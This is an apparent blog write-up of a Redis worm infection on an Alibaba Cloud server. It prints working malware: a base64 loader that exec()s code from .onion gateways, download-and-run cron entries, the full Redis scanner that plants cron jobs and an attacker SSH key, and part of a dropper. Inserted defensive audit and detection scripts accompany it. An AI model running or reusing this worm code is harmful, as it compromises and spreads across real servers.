Record of an Alibaba Cloud Linux server infected with malware

update: I didn't expect a memo I wrote for myself to get attention from others, so here is an update.

1. Some said the code displays poorly. I later found out that Markdown has to be enabled when a new article is started, and it can't be changed now.

2. At the end of the article I've added a cleanup script compiled from various sources online, for reference only; in practice, machines with a deeper infection still can't be cleaned completely.


Recently we ran into malware on our Alibaba Cloud server (CentOS Linux). It got in because a freshly installed system had Redis running with no password set; it looks like a worm. I had a look at it, and the shell script is quite well written, so I'm posting it here to learn from.
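The root cause was a Redis instance reachable from the network with no authentication. The following is an added example (not code from this post or from the worm) that audits a redis.conf for exactly that exposure: it parses the file, then flags a missing or wildcard `bind`, `protected-mode` turned off, no `requirepass`, and the commands the worm below issues by their default names (CONFIG, FLUSHALL, SLAVEOF/REPLICAOF) left un-renamed. The two sample configs are constructed; the "baseline" the checks encode is this editor's assumption of a sane minimum, not an official Redis checklist.

```python
import re

# Added example (not from the post): audit a redis.conf for the exposure the
# worm relies on. The checks below are an assumed sane baseline, not an
# official Redis hardening list.

# Commands the worm's scanner issues by their default names; renaming or
# disabling them (rename-command X "") breaks the attack even without auth.
ABUSED_COMMANDS = ('config', 'flushall', 'slaveof', 'replicaof')


def parse_redis_conf(text):
    """Return {directive: [values]} keeping the last occurrence of each directive
    (Redis applies them in order, so the last one wins). 'rename-command' is
    collected as a list of (old, new) tuples because it legitimately repeats."""
    conf = {'rename-command': []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        key, *vals = line.split()
        key = key.lower()
        if key == 'rename-command' and len(vals) == 2:
            conf['rename-command'].append((vals[0].lower(), vals[1]))
        else:
            conf[key] = vals
    return conf


def audit_redis_conf(text):
    """Return findings as 'directive: problem' strings; [] means nothing fired."""
    conf = parse_redis_conf(text)
    findings = []
    # protected-mode (default yes since 3.2) only refuses remote clients while there
    # is NO bind and NO requirepass, so an explicit bind 0.0.0.0 defeats it in effect.
    binds = [b.lower().lstrip('-') for b in conf.get('bind', [])]
    if not binds or any(b in ('0.0.0.0', '::', '*') for b in binds):
        findings.append('bind: reachable on all interfaces')
    if conf.get('protected-mode', ['yes'])[0].lower() != 'yes':
        findings.append('protected-mode: disabled')
    password = conf.get('requirepass', [])
    if not password or password[0] in ('""', "''"):
        findings.append('requirepass: not set, anyone who can reach 6379 is admin')
    renamed = {old for old, _new in conf['rename-command']}
    for cmd in ABUSED_COMMANDS:
        if cmd not in renamed:
            findings.append(f'rename-command: {cmd.upper()} still reachable under its default name')
    return findings


# Constructed sample configs. WEAK_CONF mirrors a default install with no auth
# exposed on all interfaces; HARDENED_CONF is what the same box should have had.
WEAK_CONF = """
port 6379
bind 0.0.0.0
protected-mode no
daemonize yes
dir /var/lib/redis
dbfilename dump.rdb
"""

HARDENED_CONF = """
port 6379
bind 127.0.0.1 -::1
protected-mode yes
requirepass replace-me-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
dir /var/lib/redis
dbfilename dump.rdb
"""

if __name__ == '__main__':
    for name, conf in (('weak', WEAK_CONF), ('hardened', HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ['no findings'])
```

Run it against `/etc/redis/redis.conf` (or the output of `CONFIG GET *` reshaped into directive lines) on any box that has port 6379 open; a non-empty result on a host that is not firewalled from the internet is the condition this worm scans for.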

First Alibaba Cloud sent an alert saying the server was attacking other hosts:

Dear xxxx, your cloud server (xxxx) has been detected launching attacks against external hosts, and its access to port TCP:6379 on other servers has been blocked. The block is expected to end at 2019-05-21 19:04:50. Please carry out a security self-check promptly. If you have questions, please contact Alibaba Cloud after-sales support by ticket or phone.

Thank you for your support of Alibaba Cloud.


[Alibaba Cloud] Dear xxx: one of your servers has had access to some destination ports restricted because of attacks. For details see https://c.tb.cn/I3.vWxO

After logging in and looking at the process list, there were several suspicious new processes:

```
curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ud
wget --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm -O /etc/cron.daily/cronlog
/usr/sbin/ntpd -u ntp:ntp -g
/bin/sh /root/.cache/.ntp -n
/bin/sh /root/.cache/.ntp -n
curl -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.su/images/ico/r64x75.ico -o /root/.cache/.favicon.ico
python2 -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3NsCkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5pby8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgudmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9wZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJldHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMocGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw=='))
```

Decoded, that base64 blob is the following Python (Python 2, note urllib2):

```python
#coding: utf-8
import base64
import urllib2
import ssl

# Three Tor2web gateways in front of the same .onion host, tried in order.
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".tor2web.su/"+RPATH1
d3=HOST+".onion.sh/"+RPATH1
d2=HOST+".tor2web.io/"+RPATH1

def ld(url, t):
    # Certificate verification is switched off, so any cert (or interceptor) is accepted.
    try:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    except Exception:
        ctx=False
    if ctx:
        page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
    else:
        page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
    return page

# Whatever comes back (base64-decoded) is exec()'d directly; d2 and d3 are fallbacks.
try:
    try:
        page=ld(d1, 41)
        exec(page)
    except Exception:
        page=ld(d2, 41)
        exec(page)
except Exception:
    page=ld(d3, 41)
    exec(page)
    pass
```

Its main purpose is to pull code from a remote host and exec() it, with several mirrors tried in turn as fallbacks. Note that it disables TLS certificate verification (check_hostname = False, CERT_NONE), so the Tor2web gateway certificate never has to be valid.

Then several extra files appear on the server, and their locations vary:

```
/usr/local/bin/npt
/usr/local/bin/nptd
/usr/sbin/npt
/usr/sbin/nptd
~/.cache/npt
~/.cache/.a
~/.cache/.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf
```


kill -9 on these processes doesn't help: they come back after being killed, and the crontab and SSH key files can't be deleted even as root. Searching online: it uses the Linux immutable file attribute (the i flag). Use lsattr to check the i flag on the files and their directories, and chattr to clear it.

But after you clear it, it gets set again. See the code later for the reason.
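The check a practitioner wants at this point is a list of every cron and SSH file carrying the `i` (immutable) or `a` (append-only) attribute, plus the exact chattr commands to undo them. The following added example (not code from this post) parses `lsattr` output and produces both. The `lsattr` lines are constructed to mirror what this worm leaves behind: its dropper runs `chattr +i` on authorized_keys and `chattr +a` on its .cache directory (both visible in the script further down).

```python
import re
import shlex

# Added example, not from the post. Feed it the output of e.g.
#   lsattr -d /var/spool/cron /etc/cron.d /root/.ssh /root/.cache; lsattr /var/spool/cron /etc/cron.d /root/.ssh
# lsattr prints a flag field, whitespace, then the path; the field width differs
# between e2fsprogs versions, so match "a run of flag letters / dashes" + rest.
_LSATTR_LINE = re.compile(r'^([A-Za-z-]+)\s+(.+)$')


def parse_lsattr(output):
    """Return {path: set(flag letters)}. Error lines such as
    'lsattr: Operation not supported While reading flags on /proc' are skipped."""
    result = {}
    for line in output.splitlines():
        if line.startswith('lsattr:'):
            continue
        m = _LSATTR_LINE.match(line.rstrip())
        if not m:
            continue
        flags, path = m.groups()
        result[path] = {ch for ch in flags if ch != '-'}
    return result


def locked_paths(output):
    """Paths with immutable (i) or append-only (a) set: both make rm/truncate
    fail even for root, which is the symptom described above."""
    return sorted(p for p, f in parse_lsattr(output).items() if f & {'i', 'a'})


def unlock_commands(output):
    """One chattr per locked path, removing only the flags actually set."""
    cmds = []
    for path, flags in sorted(parse_lsattr(output).items()):
        hit = ''.join(sorted(flags & {'i', 'a'}))
        if hit:
            cmds.append(f'chattr -{hit} {shlex.quote(path)}')
    return cmds


# Constructed sample: what lsattr looked like on a box hit by this worm (assumption).
SAMPLE_LSATTR = """\
----i---------e---- /root/.ssh/authorized_keys
-----a--------e---- /root/.cache
--------------e---- /var/spool/cron/root
----i---------e---- /etc/cron.d/root
lsattr: Operation not supported While reading flags on /proc
"""

if __name__ == '__main__':
    print(locked_paths(SAMPLE_LSATTR))
    print('\n'.join(unlock_commands(SAMPLE_LSATTR)))
```

Clearing the flags is only half the job: the dropper shown later re-applies them every time its cron entry fires, so remove the cron entries and kill its processes in the same pass, otherwise the attributes are back within minutes.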




In the scheduled tasks:

```
crontab -l
*/17 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; ${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt
```


Reformatted:

```sh
(tbin=$(command -v passwd);
bpath=$(dirname "${tbin}");
  # If `curl` isn't on PATH, look for any binary next to passwd that carries a curl string.
  # (The glob ${bpath}* has no slash, so it actually matches the directory itself.)
  curl="curl";
  if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];
  then
      curl="echo";
      if [ "${bpath}" != "" ];
      then
        for f in ${bpath}*;
        do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break;
        done;
      fi;
  fi;
  # Same trick for wget.
  wget="wget";
  if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];
  then
      wget="echo";
      if [ "${bpath}" != "" ];
      then
        for f in ${bpath}*;
        do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break;
        done;
      fi;
  fi;
  # Undo any /etc/hosts sinkhole of the .onion gateways (by wiping the whole file).
  if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ];
  then
      echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
  fi;
  # Three Tor2web mirrors with curl, then the same three with wget; run whatever lands.
  ${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt
  ||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt
  ||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt
  ||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt
  ||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt
  ||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt)
  && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt
```


The next piece is the worm's Redis scanner, in Python 2. It is what spreads over port 6379: it points the Redis working directory at a cron or .ssh directory and SAVEs an RDB file whose only readable line is the cron entry or SSH key.

```python
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
from random import randrange
import random
import string

IP_LIST = []
debug=0

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host

    def run(self):
        RHOST='https://an7kmd2wp4xo7hpr'
        TOR1='.tor2web.su/'
        TOR3='.onion.sh/'
        TOR2='.tor2web.io/'
        # Same curl/wget locator as the cron entry above. The \\" pairs reach Redis as \",
        # which its quoted-string parser turns back into plain double quotes.
        CHKCURL='tbin=$(command -v passwd); bpath=$(dirname \\"${tbin}\\"); curl=\\"curl\\"; if [ $(curl --version 2>/dev/null|grep \\"curl \\"|wc -l) -eq 0 ]; then curl=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"CURLOPT_VERBOSE\\" && curl=\\"$f\\" && break; done; fi; fi; wget=\\"wget\\"; if [ $(wget --version 2>/dev/null|grep \\"wgetrc \\"|wc -l) -eq 0 ]; then wget=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"to <bug-wget@gnu.org>\\" && wget=\\"$f\\" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i \\".onion.\\"|wc -l) -ne 0 ]; then echo \\"127.0.0.1 localhost\\" > /etc/hosts >/dev/null 2>&1; fi; '
        RPATH1='src/ldm'
        TIMEOUT='40'
        COPTS='-fsSLk --max-time '+TIMEOUT
        WOPTS='--quiet --no-check-certificate --timeout='+TIMEOUT
        # C1 is the system-crontab form (with a user field), C2 the per-user form.
        # The \\n\\n padding becomes real newlines inside the RDB dump, so the entry
        # sits on a line of its own and cron parses it while ignoring the binary around it.
        C1='\\n\\n*/1 * * * * root ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'
        C2='\\n\\n*/1 * * * * ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'
        # The attacker's public key; the trailing "#" comments out whatever RDB bytes follow it.
        SKEY="\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost\\n#"
        try:
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.settimeout(3)
            x = s2.connect_ex((self.host, 6379))
            if x == 0:
                DFDIR=DFRDB='N/A'
                stt1=stt2=stt3=stt4=stt5=-9
                # Remember the real dir/dbfilename so they can be restored afterwards.
                tmp=rd(s2, 'config get dir\r\n')
                if "Authentication required" in str(tmp): stt1=-10
                elif "-ERR unknown command" not in str(tmp):
                    if 'dir' in str(tmp): DFDIR=(tmp.split('dir'))[1].splitlines()[2]
                    tmp=rd(s2, 'config get dbfilename\r\n')
                    if 'dbfilename' in str(tmp): DFRDB=(tmp.split('dbfilename'))[1].splitlines()[2]
                    rs=rd(s2, 'config set dbfilename root\r\n')
                    if "+OK" in str(rs):
                        # No compression, so the payload is stored verbatim in the RDB file.
                        rs=rd(s2, 'config set rdbcompression no\r\n')
                        if "+OK" in str(rs):
                            write=rd(s2, 'flushall\r\n')
                            if "write against a read only" in str(write):
                                # Read-only replica: detach it so it accepts writes.
                                rd(s2, 'SLAVEOF NO ONE\r\n')
                                write=rd(s2, 'flushall\r\n')
                            if "write against a read only" not in str(write):
                                K1=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
                                K2=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
                                K3=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
                                CF=''.join(random.choice(string.lowercase) for x in range(random.randint(6, 18)))
                                rs=rd(s2, 'config set stop-writes-on-bgsave-error no\r\n')
                                #rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')
                                rs=rd(s2, 'set '+K2+' "'+C2+'"\r\n')
                                # Probe for a Debian-only directory to pick the cron spool layout.
                                apt=chkdir(s2, '/usr/share/bug/apt/')
                                if apt == -4:
                                    fml='N.'
                                    stt1=chkdir(s2, '/var/spool/cron')
                                else:
                                    fml='Debian.'
                                    stt1=chkdir(s2, '/var/spool/cron/crontabs')
                                pine=chkdir(s2, '/etc/crontabs')
                                rs=rd(s2, 'del '+K2+'\r\n')
                                rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')
                                rs=rd(s2, 'config set dbfilename .'+CF+'\r\n')
                                stt2=chkdir(s2, '/etc/cron.d')
                                rs=rd(s2, 'config set dbfilename crontab\r\n')
                                stt22=chkdir(s2, '/etc')
                                if stt2 < 2: stt2=stt22
                                rs=rd(s2, 'del '+K1+'\r\n')
                                # Same trick for SSH: dump a file named authorized_keys into .ssh.
                                rs=rd(s2, 'config set dbfilename authorized_keys\r\n')
                                rs=rd(s2, 'set '+K3+' "'+SKEY+'"\r\n')
                                stt3=chkdir(s2, '/root/.ssh')
                                stt4=chkdir(s2, '/home/ubuntu/.ssh')
                                #time.sleep(1)
                                rs=rd(s2, 'del '+K3+'\r\n')
                            rs=rd(s2, 'config set rdbcompression yes\r\n')
                            rs=rd(s2, 'config set stop-writes-on-bgsave-error yes\r\n')
                        # Put the original settings back so the tampering is less obvious.
                        if "cron" not in str(DFDIR) and ".ssh" not in str(DFDIR):
                            rs=rd(s2, 'config set dir '+DFDIR+'\r\n')
                            rs=rd(s2, 'config set dbfilename '+DFRDB+'\r\n')
                        else:
                            rs=rd(s2, 'config set dir /var/lib/redis\r\n')
                            rs=rd(s2, 'config set dbfilename dump.rdb\r\n')
            s2.close()
        except Exception:
            pass

        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()
    newthread = staticmethod(newthread)

def get_ip_list():
    # Learn the public IP from ifconfig.co and enqueue the whole surrounding /16;
    # falls back to the local interface address if the lookup fails.
    try:
        url = 'ifconfig.co/ip'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip1 = result.read()
        ips1 = findall(r'\d+.\d+.', ip1)[0]
        for u in range(0, 256):
            ip_list1 = (ips1 + (str(u)))
            for g in range(1, 256):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list2 = (ips2 + (str(i)))
            for g in range(1, 255):
                IP_LIST.append(ip_list2 + '.' + (str(g)))
        pass

def get_ip_list2():
    # 100000 random public addresses per round, skipping first octets that are
    # private/loopback/link-local (only the crude first-octet check, note).
    not_valid = [10,127,169,172,192]
    for i in range(0, 100000):
        first = randrange(1,227)
        while first in not_valid:
            first = randrange(1,227)
        ip = ".".join([str(first),str(randrange(0,256)),
        str(randrange(0,256)),str(randrange(0,256))])
        IP_LIST.append(ip)

def runPortscan():
    for x in range(99999):
        get_ip_list2()
        for host in IP_LIST:
            scanner.lck.acquire()
            if len(scanner.tlist) >= scanner.maxthreads:
                scanner.lck.release()
                scanner.evnt.wait()
            else:
                scanner.lck.release()
            scanner.newthread(host)
        for t in scanner.tlist:
            t.join()

def rd(sock, packet):
    # Inline (non-RESP) Redis command; the reply is read as one chunk.
    try:
        sock.send(packet)
        reply = sock.recv(1024)
        if not reply: pass
        if '*' not in reply and '$' not in reply and '+' not in reply and ':' not in reply and debug >= 2: print(reply)
        return reply
    except:
        pass

def chkdir(sock, dir):
    # CONFIG SET dir + SAVE: 2 means the RDB landed in `dir`, -4 means the
    # directory doesn't exist (used both for dropping files and for fingerprinting).
    stt=0
    rs=rd(sock, 'config set dir '+dir+'\r\n')
    if "+OK" in str(rs):
        stt=1
        rs=rd(sock, 'save\r\n')
        if "+OK" in str(rs):
            stt=2
    elif "o such file or " in str(rs): stt=-4
    return stt

if __name__ == "__main__":
    try:
        runPortscan()
    except KeyboardInterrupt:
        try:
            exit(0)
        except SystemExit:
            os._exit(0)
```
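The two artifacts this scanner leaves behind (the cron entry shown earlier and the authorized_keys write in chkdir()) share one tell: the files are Redis RDB dumps, so they begin with the bytes `REDIS` followed by a version number, and the only readable line in them is the injected cron entry or key. The following added example (not code from the post or the worm) walks the same cron and .ssh locations the scanner targets and flags files that either carry the RDB magic or contain the worm's indicators (its .onion host, Tor2web gateways, a download-then-`sh` chain, the attacker's key prefix), extracting any cron lines it finds. The directory tree it scans is constructed in a temp directory so it runs offline; the RDB-like file is only loosely shaped (magic, one aux field, one key, a simplified length prefix), not a byte-exact dump.

```python
import os
import re
import tempfile

# Added example, not from the post. Detects the files the Redis scanner above
# drops: cron/authorized_keys files that are really RDB dumps, plus IoC lines.

RDB_MAGIC = b'REDIS'  # every RDB file starts with "REDIS" + a 4-digit version

IOC_PATTERNS = {
    'onion-host': re.compile(rb'an7kmd2wp4xo7hpr'),                       # C2 host from the post
    'tor2web-gateway': re.compile(rb'\.tor2web\.|\.onion\.'),
    'download-and-run': re.compile(rb'chmod \+x [^\n]*&&[^\n]*\bsh\b'),
    'worm-ssh-key': re.compile(rb'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx'),
}

# The locations chkdir() tries; directories are walked recursively, files checked directly.
DEFAULT_TARGETS = ['/var/spool/cron', '/etc/cron.d', '/etc/crontabs', '/etc/crontab',
                   '/root/.ssh', '/home/ubuntu/.ssh']

# "*/1 * * * * (" or "*/11 * * * * root (" : schedule, optional user, then the subshell.
CRON_LINE = re.compile(rb'^\s*(\*|\d+)(/\d+)?(\s+\S+){4,5}\s*\(')


def extract_cron_lines(data):
    """Readable cron entries in the file. In an RDB-written crontab the payload is
    wrapped in \\n\\n, so it sits on its own line and cron parses it while
    skipping the binary junk around it."""
    return [ln.decode('latin-1') for ln in data.split(b'\n') if CRON_LINE.match(ln)]


def inspect_file(path):
    """Return a finding dict, or None when the file shows neither artifact."""
    with open(path, 'rb') as fh:
        data = fh.read()
    iocs = [name for name, pat in IOC_PATTERNS.items() if pat.search(data)]
    rdb_written = data.startswith(RDB_MAGIC)
    if not (iocs or rdb_written):
        return None
    return {'path': path, 'rdb_written': rdb_written, 'iocs': iocs,
            'cron_lines': extract_cron_lines(data)}


def scan(targets):
    hits = []
    for target in targets:
        if os.path.isfile(target):
            files = [target]
        else:  # os.walk on a missing directory simply yields nothing
            files = [os.path.join(r, n) for r, _, names in os.walk(target) for n in names]
        for f in files:
            finding = inspect_file(f)
            if finding:
                hits.append(finding)
    return hits


def build_sample_tree():
    """Constructed look-alike of the infected host's files under a temp root."""
    root = tempfile.mkdtemp(prefix='redis-worm-demo-')
    cron_entry = (b'\n\n*/1 * * * * root (curl -fsSLk https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm '
                  b'-o ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\n\n')
    # Loosely RDB-shaped: magic, aux field, db selector, one string key, payload, EOF marker.
    rdb_crontab = (b'REDIS0009\xfa\x09redis-ver\x055.0.3\xfe\x00\x00\x06xkqzpv'
                   + bytes([len(cron_entry)]) + cron_entry + b'\xff' + b'\x00' * 8)
    files = {
        'var/spool/cron/root': rdb_crontab,
        'root/.ssh/authorized_keys': b'\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fu user@localhost\n#\n',
        'etc/cron.d/backup': b'# m h dom mon dow user command\n0 3 * * * root /usr/local/bin/backup.sh\n',
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'wb') as fh:
            fh.write(content)
    return root


def demo():
    """Scan the constructed tree; returns {basename: finding}."""
    root = build_sample_tree()
    targets = [os.path.join(root, t.lstrip('/')) for t in DEFAULT_TARGETS]
    return {os.path.basename(h['path']): h for h in scan(targets)}


if __name__ == '__main__':
    for name, hit in demo().items():
        print(name, hit['rdb_written'], hit['iocs'], hit['cron_lines'])
```

On a real host call `scan(DEFAULT_TARGETS)` as root (add `/home/*/.ssh` as needed); the RDB-magic check catches the dropped files even after the attacker rotates hostnames, because it depends on how Redis writes files, not on the C2 strings.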

In it you can see it pulls further remote code from

https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm

After base64 decoding, that code (the shell dropper) looks like this:

```sh
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
